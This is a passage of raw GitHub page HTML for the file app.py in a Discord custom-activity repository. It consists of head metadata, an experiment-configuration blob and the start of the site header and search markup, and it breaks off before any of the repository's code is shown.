content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU"> <meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA"> <meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc"> <meta name="octolytics-host" content="collector.githubapp.com" /><meta name="octolytics-app-id" content="github" /><meta name="octolytics-event-url" content="https://collector.githubapp.com/github-external/browser_event" /><meta name="octolytics-actor-id" content="91737103" /><meta name="octolytics-actor-login" content="Bomzz06" /><meta name="octolytics-actor-hash" content="768d6322e087f5dd93879e36a05bc5cd2c0b8e677c83f0a6378ea6775b96f44b" /> <meta name="analytics-location" content="/&lt;user-name&gt;/&lt;repo-name&gt;/blob/show" data-pjax-transient="true" /> <meta name="optimizely-datafile" content="{&quot;version&quot;: &quot;4&quot;, &quot;rollouts&quot;: [], &quot;typedAudiences&quot;: [], &quot;anonymizeIP&quot;: true, &quot;projectId&quot;: &quot;16737760170&quot;, &quot;variables&quot;: [], &quot;featureFlags&quot;: [], &quot;experiments&quot;: [{&quot;status&quot;: &quot;Running&quot;, &quot;audienceIds&quot;: [], &quot;variations&quot;: [{&quot;variables&quot;: [], &quot;id&quot;: &quot;20438636352&quot;, &quot;key&quot;: &quot;control&quot;}, {&quot;variables&quot;: [], &quot;id&quot;: &quot;20484957397&quot;, &quot;key&quot;: &quot;treatment&quot;}], &quot;id&quot;: &quot;20479227424&quot;, &quot;key&quot;: &quot;growth_ghec_onboarding_experience&quot;, &quot;layerId&quot;: &quot;20467848595&quot;, &quot;trafficAllocation&quot;: [{&quot;entityId&quot;: &quot;20484957397&quot;, &quot;endOfRange&quot;: 1000}, {&quot;entityId&quot;: &quot;20438636352&quot;, &quot;endOfRange&quot;: 5000}, {&quot;entityId&quot;: &quot;20438636352&quot;, &quot;endOfRange&quot;: 6000}, {&quot;entityId&quot;: &quot;20484957397&quot;, &quot;endOfRange&quot;: 8000}, {&quot;entityId&quot;: &quot;20484957397&quot;, &quot;endOfRange&quot;: 10000}], &quot;forcedVariations&quot;: {}}, {&quot;status&quot;: &quot;Running&quot;, &quot;audienceIds&quot;: [], &quot;variations&quot;: [{&quot;variables&quot;: [], &quot;id&quot;: &quot;20508232513&quot;, &quot;key&quot;: &quot;control&quot;}, {&quot;variables&quot;: [], &quot;id&quot;: &quot;20533742085&quot;, &quot;key&quot;: &quot;treatment&quot;}], &quot;id&quot;: &quot;20512531891&quot;, &quot;key&quot;: &quot;growth_pull_request_actions_prompt&quot;, &quot;layerId&quot;: &quot;20529822202&quot;, &quot;trafficAllocation&quot;: [{&quot;entityId&quot;: &quot;20533742085&quot;, &quot;endOfRange&quot;: 5000}, {&quot;entityId&quot;: &quot;20508232513&quot;, &quot;endOfRange&quot;: 10000}], &quot;forcedVariations&quot;: {}}, {&quot;status&quot;: &quot;Running&quot;, &quot;audienceIds&quot;: [], &quot;variations&quot;: [{&quot;variables&quot;: [], &quot;id&quot;: &quot;20543572345&quot;, &quot;key&quot;: &quot;control&quot;}, {&quot;variables&quot;: [], &quot;id&quot;: &quot;20510876757&quot;, &quot;key&quot;: &quot;treatment&quot;}], &quot;id&quot;: &quot;20518037255&quot;, &quot;key&quot;: &quot;growth_issue_actions_prompt&quot;, &quot;layerId&quot;: &quot;20522524291&quot;, &quot;trafficAllocation&quot;: [{&quot;entityId&quot;: &quot;20510876757&quot;, &quot;endOfRange&quot;: 5000}, {&quot;entityId&quot;: &quot;20543572345&quot;, &quot;endOfRange&quot;: 10000}], &quot;forcedVariations&quot;: {}}, {&quot;status&quot;: &quot;Running&quot;, &quot;audienceIds&quot;: [], &quot;variations&quot;: [{&quot;variables&quot;: [], &quot;id&quot;: &quot;20619540113&quot;, &quot;key&quot;: &quot;control&quot;}, {&quot;variables&quot;: [], &quot;id&quot;: &quot;20598530123&quot;, &quot;key&quot;: &quot;treatment&quot;}], &quot;id&quot;: &quot;20619150105&quot;, &quot;key&quot;: &quot;dynamic_seats&quot;, &quot;layerId&quot;: &quot;20615170077&quot;, &quot;trafficAllocation&quot;: [{&quot;entityId&quot;: &quot;20598530123&quot;, &quot;endOfRange&quot;: 5000}, {&quot;entityId&quot;: &quot;20619540113&quot;, &quot;endOfRange&quot;: 10000}], &quot;forcedVariations&quot;: {}}], &quot;audiences&quot;: [{&quot;conditions&quot;: &quot;[\&quot;or\&quot;, {\&quot;match\&quot;: \&quot;exact\&quot;, \&quot;name\&quot;: \&quot;$opt_dummy_attribute\&quot;, \&quot;type\&quot;: \&quot;custom_attribute\&quot;, \&quot;value\&quot;: \&quot;$opt_dummy_value\&quot;}]&quot;, &quot;id&quot;: &quot;$opt_dummy_audience&quot;, &quot;name&quot;: &quot;Optimizely-Generated Audience for Backwards Compatibility&quot;}], &quot;groups&quot;: [], &quot;sdkKey&quot;: &quot;WTc6awnGuYDdG98CYRban&quot;, &quot;environmentKey&quot;: &quot;production&quot;, &quot;attributes&quot;: [{&quot;id&quot;: &quot;16822470375&quot;, &quot;key&quot;: &quot;user_id&quot;}, {&quot;id&quot;: &quot;17143601254&quot;, &quot;key&quot;: &quot;spammy&quot;}, {&quot;id&quot;: &quot;18175660309&quot;, &quot;key&quot;: &quot;organization_plan&quot;}, {&quot;id&quot;: &quot;18813001570&quot;, &quot;key&quot;: &quot;is_logged_in&quot;}, {&quot;id&quot;: &quot;19073851829&quot;, &quot;key&quot;: &quot;geo&quot;}, {&quot;id&quot;: &quot;20175462351&quot;, &quot;key&quot;: &quot;requestedCurrency&quot;}], &quot;botFiltering&quot;: false, &quot;accountId&quot;: &quot;16737760170&quot;, &quot;events&quot;: [{&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;17911811441&quot;, &quot;key&quot;: &quot;hydro_click.dashboard.teacher_toolbox_cta&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18124116703&quot;, &quot;key&quot;: &quot;submit.organizations.complete_sign_up&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18145892387&quot;, &quot;key&quot;: &quot;no_metric.tracked_outside_of_optimizely&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18178755568&quot;, &quot;key&quot;: &quot;click.org_onboarding_checklist.add_repo&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18180553241&quot;, &quot;key&quot;: &quot;submit.repository_imports.create&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18186103728&quot;, &quot;key&quot;: &quot;click.help.learn_more_about_repository_creation&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18188530140&quot;, &quot;key&quot;: &quot;test_event.do_not_use_in_production&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18191963644&quot;, &quot;key&quot;: &quot;click.empty_org_repo_cta.transfer_repository&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18195612788&quot;, &quot;key&quot;: &quot;click.empty_org_repo_cta.import_repository&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18210945499&quot;, &quot;key&quot;: &quot;click.org_onboarding_checklist.invite_members&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18211063248&quot;, &quot;key&quot;: &quot;click.empty_org_repo_cta.create_repository&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18215721889&quot;, &quot;key&quot;: &quot;click.org_onboarding_checklist.update_profile&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18224360785&quot;, &quot;key&quot;: &quot;click.org_onboarding_checklist.dismiss&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18234832286&quot;, &quot;key&quot;: &quot;submit.organization_activation.complete&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18252392383&quot;, &quot;key&quot;: &quot;submit.org_repository.create&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18257551537&quot;, &quot;key&quot;: &quot;submit.org_member_invitation.create&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18259522260&quot;, &quot;key&quot;: &quot;submit.organization_profile.update&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18564603625&quot;, &quot;key&quot;: &quot;view.classroom_select_organization&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18568612016&quot;, &quot;key&quot;: &quot;click.classroom_sign_in_click&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18572592540&quot;, &quot;key&quot;: &quot;view.classroom_name&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18574203855&quot;, &quot;key&quot;: &quot;click.classroom_create_organization&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18582053415&quot;, &quot;key&quot;: &quot;click.classroom_select_organization&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18589463420&quot;, &quot;key&quot;: &quot;click.classroom_create_classroom&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18591323364&quot;, &quot;key&quot;: &quot;click.classroom_create_first_classroom&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18591652321&quot;, &quot;key&quot;: &quot;click.classroom_grant_access&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18607131425&quot;, &quot;key&quot;: &quot;view.classroom_creation&quot;}, {&quot;experimentIds&quot;: [&quot;20479227424&quot;, &quot;20619150105&quot;], &quot;id&quot;: &quot;18831680583&quot;, &quot;key&quot;: &quot;upgrade_account_plan&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;19064064515&quot;, &quot;key&quot;: &quot;click.signup&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;19075373687&quot;, &quot;key&quot;: &quot;click.view_account_billing_page&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;19077355841&quot;, &quot;key&quot;: &quot;click.dismiss_signup_prompt&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;19079713938&quot;, &quot;key&quot;: &quot;click.contact_sales&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;19120963070&quot;, &quot;key&quot;: &quot;click.compare_account_plans&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;19151690317&quot;, &quot;key&quot;: &quot;click.upgrade_account_cta&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;19424193129&quot;, &quot;key&quot;: &quot;click.open_account_switcher&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;19520330825&quot;, &quot;key&quot;: &quot;click.visit_account_profile&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;19540970635&quot;, &quot;key&quot;: &quot;click.switch_account_context&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;19730198868&quot;, &quot;key&quot;: &quot;submit.homepage_signup&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;19820830627&quot;, &quot;key&quot;: &quot;click.homepage_signup&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;19988571001&quot;, &quot;key&quot;: &quot;click.create_enterprise_trial&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20036538294&quot;, &quot;key&quot;: &quot;click.create_organization_team&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20040653299&quot;, &quot;key&quot;: &quot;click.input_enterprise_trial_form&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20062030003&quot;, &quot;key&quot;: &quot;click.continue_with_team&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20068947153&quot;, &quot;key&quot;: &quot;click.create_organization_free&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20086636658&quot;, &quot;key&quot;: &quot;click.signup_continue.username&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20091648988&quot;, &quot;key&quot;: &quot;click.signup_continue.create_account&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20103637615&quot;, &quot;key&quot;: &quot;click.signup_continue.email&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20111574253&quot;, &quot;key&quot;: &quot;click.signup_continue.password&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20120044111&quot;, &quot;key&quot;: &quot;view.pricing_page&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20152062109&quot;, &quot;key&quot;: &quot;submit.create_account&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20165800992&quot;, &quot;key&quot;: &quot;submit.upgrade_payment_form&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20171520319&quot;, &quot;key&quot;: &quot;submit.create_organization&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20222645674&quot;, &quot;key&quot;: &quot;click.recommended_plan_in_signup.discuss_your_needs&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20227443657&quot;, &quot;key&quot;: &quot;submit.verify_primary_user_email&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20234607160&quot;, &quot;key&quot;: &quot;click.recommended_plan_in_signup.try_enterprise&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20238175784&quot;, &quot;key&quot;: &quot;click.recommended_plan_in_signup.team&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20239847212&quot;, &quot;key&quot;: &quot;click.recommended_plan_in_signup.continue_free&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20251097193&quot;, &quot;key&quot;: &quot;recommended_plan&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20438619534&quot;, &quot;key&quot;: &quot;click.pricing_calculator.1_member&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20456699683&quot;, &quot;key&quot;: &quot;click.pricing_calculator.15_members&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20467868331&quot;, &quot;key&quot;: &quot;click.pricing_calculator.10_members&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20476267432&quot;, &quot;key&quot;: &quot;click.trial_days_remaining&quot;}, {&quot;experimentIds&quot;: [&quot;20479227424&quot;], &quot;id&quot;: &quot;20476357660&quot;, &quot;key&quot;: &quot;click.discover_feature&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20479287901&quot;, &quot;key&quot;: &quot;click.pricing_calculator.custom_members&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20481107083&quot;, &quot;key&quot;: &quot;click.recommended_plan_in_signup.apply_teacher_benefits&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20483089392&quot;, &quot;key&quot;: &quot;click.pricing_calculator.5_members&quot;}, {&quot;experimentIds&quot;: [&quot;20479227424&quot;], &quot;id&quot;: &quot;20484283944&quot;, &quot;key&quot;: &quot;click.onboarding_task&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20484996281&quot;, &quot;key&quot;: &quot;click.recommended_plan_in_signup.apply_student_benefits&quot;}, {&quot;experimentIds&quot;: [&quot;20479227424&quot;], &quot;id&quot;: &quot;20486713726&quot;, &quot;key&quot;: &quot;click.onboarding_task_breadcrumb&quot;}, {&quot;experimentIds&quot;: [&quot;20479227424&quot;], &quot;id&quot;: &quot;20490791319&quot;, &quot;key&quot;: &quot;click.upgrade_to_enterprise&quot;}, {&quot;experimentIds&quot;: [&quot;20479227424&quot;], &quot;id&quot;: &quot;20491786766&quot;, &quot;key&quot;: &quot;click.talk_to_us&quot;}, {&quot;experimentIds&quot;: [&quot;20479227424&quot;], &quot;id&quot;: &quot;20494144087&quot;, &quot;key&quot;: &quot;click.dismiss_enterprise_trial&quot;}, {&quot;experimentIds&quot;: [&quot;20479227424&quot;], &quot;id&quot;: &quot;20499722759&quot;, &quot;key&quot;: &quot;completed_all_tasks&quot;}, {&quot;experimentIds&quot;: [&quot;20479227424&quot;], &quot;id&quot;: &quot;20500710104&quot;, &quot;key&quot;: &quot;completed_onboarding_tasks&quot;}, {&quot;experimentIds&quot;: [&quot;20479227424&quot;], &quot;id&quot;: &quot;20513160672&quot;, &quot;key&quot;: &quot;click.read_doc&quot;}, {&quot;experimentIds&quot;: [&quot;20512531891&quot;], &quot;id&quot;: &quot;20516196762&quot;, &quot;key&quot;: &quot;actions_enabled&quot;}, {&quot;experimentIds&quot;: [&quot;20479227424&quot;], &quot;id&quot;: &quot;20518980986&quot;, &quot;key&quot;: &quot;click.dismiss_trial_banner&quot;}, {&quot;experimentIds&quot;: [&quot;20518037255&quot;], &quot;id&quot;: &quot;20535446721&quot;, &quot;key&quot;: &quot;click.issue_actions_prompt.dismiss_prompt&quot;}, {&quot;experimentIds&quot;: [&quot;20518037255&quot;], &quot;id&quot;: &quot;20557002247&quot;, &quot;key&quot;: &quot;click.issue_actions_prompt.setup_workflow&quot;}, {&quot;experimentIds&quot;: [&quot;20512531891&quot;], &quot;id&quot;: &quot;20595070227&quot;, &quot;key&quot;: &quot;click.pull_request_setup_workflow&quot;}, {&quot;experimentIds&quot;: [&quot;20619150105&quot;], &quot;id&quot;: &quot;20626600314&quot;, &quot;key&quot;: &quot;click.seats_input&quot;}, {&quot;experimentIds&quot;: [&quot;20619150105&quot;], &quot;id&quot;: &quot;20642310305&quot;, &quot;key&quot;: &quot;click.decrease_seats_number&quot;}, {&quot;experimentIds&quot;: [&quot;20619150105&quot;], &quot;id&quot;: &quot;20662990045&quot;, &quot;key&quot;: &quot;click.increase_seats_number&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20679620969&quot;, &quot;key&quot;: &quot;click.public_product_roadmap&quot;}], &quot;revision&quot;: &quot;903&quot;}" /> <!-- To prevent page flashing, the optimizely JS needs to be loaded in the <head> tag before the DOM renders --> <script crossorigin="anonymous" defer="defer" integrity="sha512-0h1v+cT+vo2H4r2RIaHBoqggV4iI4Ah+a66PI4mUxhOkt3B7B/OeCMj80fIAb23CGQDCEYsVduIJfHChKLMFhw==" type="application/javascript" src="https://github.githubassets.com/assets/optimizely-d21d6ff9.js"></script> <meta name="hostname" content="github.com"> <meta name="user-login" content="Bomzz06"> <meta name="expected-hostname" content="github.com"> <meta name="js-proxy-site-detection-payload" content="YmM1ZWQ3YTU2YWQxZWUyNTM3YzRhMzM4M2MyODg5MzI0OWZiYmQxNmRhZTFhYmM5MTU1YzEwZGQ0YzZjNTRlMnx7InJlbW90ZV9hZGRyZXNzIjoiMTQwLjIxMy43LjE4NCIsInJlcXVlc3RfaWQiOiJBNDlGOjc4NTk6RDM5Njg6MTRGQUNEOjYxNUFFMjg1IiwidGltZXN0YW1wIjoxNjMzMzQ2MTgxLCJob3N0IjoiZ2l0aHViLmNvbSJ9"> <meta name="keyboard-shortcuts-preference" content="all"> <meta name="enabled-features" content="BRANCH_PROTECTION_RULE_WEBHOOK,MARKETPLACE_PENDING_INSTALLATIONS,FILE_UPLOAD_CURSOR_POSITION"> <meta http-equiv="x-pjax-version" content="c968ea42bc668fd66601e1b1178d236136ff381f20e8b8409d15e3dcd3c1c765"> <meta http-equiv="x-pjax-csp-version" content="8bb37f5b1649ef2bd79e9fefcbdd2cf21c1ba6315dbff4f9055455365d2daa86"> <meta http-equiv="x-pjax-css-version" content="b2fa4163e7018ea220c6ecc3a98eb4b79de0edb28e96ffba31345742dc34a9d7"> <meta http-equiv="x-pjax-js-version" content="b62840f36bdd7b926c395951e9aa0f266160de0281ac06d8cd24486348846c8e"> <meta name="go-import" content="github.com/agambajwa/discord-custom-activity git https://github.com/agambajwa/discord-custom-activity.git"> <meta name="octolytics-dimension-user_id" content="30459122" /><meta name="octolytics-dimension-user_login" content="agambajwa" /><meta name="octolytics-dimension-repository_id" content="298526344" /><meta name="octolytics-dimension-repository_nwo" content="agambajwa/discord-custom-activity" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="298526344" /><meta name="octolytics-dimension-repository_network_root_nwo" content="agambajwa/discord-custom-activity" /> <link rel="canonical" href="https://github.com/agambajwa/discord-custom-activity/blob/master/app.py" data-pjax-transient> <meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats"> <meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors"> <meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors"> <link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg"> <meta name="theme-color" content="#1e2327"> <meta name="color-scheme" content="light dark" /> <meta name="msapplication-TileImage" content="/windows-tile.png"> <meta name="msapplication-TileColor" content="#ffffff"> <link rel="manifest" href="/manifest.json" crossOrigin="use-credentials"> </head> <body class="logged-in env-production page-responsive page-blob" style="word-wrap: break-word;"> <div class="position-relative js-header-wrapper "> <a href="#start-of-content" class="p-3 color-bg-info-inverse color-text-white show-on-focus js-skip-to-content">Skip to content</a> <span data-view-component="true" class="progress-pjax-loader js-pjax-loader-bar Progress position-fixed width-full"> <span style="width: 0%;" data-view-component="true" class="Progress-item progress-pjax-loader-bar color-bg-info-inverse"></span> </span> <header class="Header js-details-container Details px-3 px-md-4 px-lg-5 flex-wrap flex-md-nowrap" role="banner" > <div class="Header-item mt-n1 mb-n1 d-none d-md-flex"> <a class="Header-link " href="https://github.com/" data-hotkey="g d" aria-label="Homepage " data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Header&quot;,&quot;action&quot;:&quot;go to dashboard&quot;,&quot;label&quot;:&quot;icon:logo&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="4caab5790c0a42a2267601624fa799518e43617bad147991e919699a43f0bf22" > <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github v-align-middle"> <path fill-rule="evenodd" d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"></path> </svg> </a> </div> <div class="Header-item d-md-none"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="Header-link js-details-target btn-link"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-three-bars"> <path fill-rule="evenodd" d="M1 2.75A.75.75 0 011.75 2h12.5a.75.75 0 110 1.5H1.75A.75.75 0 011 2.75zm0 5A.75.75 0 011.75 7h12.5a.75.75 0 110 1.5H1.75A.75.75 0 011 7.75zM1.75 12a.75.75 0 100 1.5h12.5a.75.75 0 100-1.5H1.75z"></path> </svg> </button> </div> <div class="Header-item Header-item--full flex-column flex-md-row width-full flex-order-2 flex-md-order-none mr-0 mr-md-3 mt-3 mt-md-0 Details-content--hidden-not-important d-md-flex"> <div class="header-search flex-auto js-site-search position-relative flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to" > <div class="position-relative"> <!-- '"` --><!-- </textarea></xmp> --></option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="Repository" data-scope-id="298526344" data-scoped-search-url="/agambajwa/discord-custom-activity/search" data-owner-scoped-search-url="/users/agambajwa/search" data-unscoped-search-url="/search" action="/agambajwa/discord-custom-activity/search" accept-charset="UTF-8" method="get"> <label class="form-control input-sm header-search-wrapper p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center"> <input type="text" class="form-control input-sm header-search-input jump-to-field js-jump-to-field js-site-search-focus js-site-search-field is-clearable" data-hotkey=s,/ name="q" data-test-selector="nav-search-input" placeholder="Search or jump to…" data-unscoped-placeholder="Search or jump to…" data-scoped-placeholder="Search or jump to…" autocapitalize="off" role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search or jump to…" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off" > <input type="hidden" value="0TRNZE4AKSd7FDM4Jmb/6vBlsky+mAoILrfFfkkGXsFpeLxUCyLlu1AqgkfeyqWebEqpzzt6jMaWf/NsLwPdbw==" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" /> <input type="hidden" class="js-site-search-type-field" name="type" > <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg> <div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container"> <ul class="d-none js-jump-to-suggestions-template-container"> <li class="d-flex flex-justify-start flex-items-center p-0 f5 navigation-item js-navigation-item js-jump-to-suggestion" role="option"> <a tabindex="-1" class="no-underline d-flex flex-auto flex-items-center jump-to-suggestions-path js-jump-to-suggestion-path js-navigation-open p-2" href="" data-item-type="suggestion"> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path> </svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path> </svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path> </svg> </div> <img class="avatar mr-2 flex-shrink-0 js-jump-to-suggestion-avatar d-none" alt="" aria-label="Team" src="" width="28" height="28"> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span class="js-jump-to-badge-search-text-default d-none" aria-label="in this repository"> In this repository </span> <span class="js-jump-to-badge-search-text-global d-none" aria-label="in all of GitHub"> All GitHub </span> <span aria-hidden="true" class="d-inline-block ml-1 v-align-middle">↵</span> </div> <div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span class="d-inline-block ml-1 v-align-middle">↵</span> </div> </a> </li> </ul> <ul class="d-none js-jump-to-no-results-template-container"> <li class="d-flex flex-justify-center flex-items-center f5 d-none js-jump-to-suggestion p-2"> <span class="color-text-secondary">No suggested 